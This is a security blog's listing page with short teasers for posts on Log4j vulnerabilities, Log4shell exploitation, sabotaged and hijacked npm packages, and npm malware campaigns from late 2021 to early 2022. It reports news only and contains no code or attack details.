New Log4j 1.x CVEs, and critical Chainsaw Vulnerability — What to Do?

By Ax Sharma on January 21, 2022 vulnerabilities

5 minute read time

Apache disclosed 3 vulns impacting Log4j 1.x versions, which included info on a critical Apache Chainsaw vulnerability buried within.
Read More...

npm Libraries ‘colors’ and ‘faker’ Sabotaged in Protest by their Maintainer—What to do Now?

By Ax Sharma on January 10, 2022 vulnerabilities

7 minute read time

Popular npm open source libraries, colors.js, and faker.js were sabotaged by their own maintainer. What does that mean for open source sustainability?
Read More...

Researcher Takes Over qr.js via Repo Hijacking. Is the npm Package Safe?

By Ax Sharma on December 31, 2021 vulnerabilities

5 minute read time

Analyzing a live incident of repo jacking that affects the GitHub repository of the popular ‘qr.js’ library.
Read More...

Log4j 2.17.1 fixes another code execution bug, but should you worry?

By Ax Sharma on December 29, 2021 vulnerabilities

7 minute read time

News of another possible open source vulnerability connected to Log4j raised eyebrows. A look at the issue, it's disclosure, and our response.
Read More...

Log4j Exploits Are Now Being Used to Spread Dridex Banking Trojan

By Ax Sharma on December 21, 2021 vulnerabilities

5 minute read time

Log4shell exploits are now being leveraged by threat actors to infect Windows machines with the Dridex Trojan and Linux devices with Meterpreter
Read More...

Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire?

By Ilkka Turunen on December 14, 2021 vulnerabilities

6 minute read time

What the download numbers tell us about the impact of the critical vulnerability CVE-2021-44228
Read More...

Critical New 0-day Vulnerability in Popular Log4j Library Discovered  with Evidence of Mass Scanning for Affected Applications - Latest updates

By Ilkka Turunen on December 10, 2021 vulnerabilities

7 minute read time

A serious 0-day Remote Code Execution exploit in log4j, the most popular java logging framework, was discovered today. Immediate action is needed from software maintainers.
Read More...

Tracking the ‘Noblox.js’ npm Malware Campaign

By Juan Aguirre on November 23, 2021 vulnerabilities

4 minute read time

Another malicious npm package, noblox.js-rpc was spotted on registry that leverages familiar techniques to steal all sorts of sensitive data.
Read More...

NPM Hijackers at it Again: Popular ‘coa’ and ‘rc’ Open Source Libraries Taken Over to Spread Malware

By Juan Aguirre on November 05, 2021 vulnerabilities

6 minute read time

Npm coa and rc packages were hijacked, via an account takeover, again highlighting the need to protect your open source software supply chains.
Read More...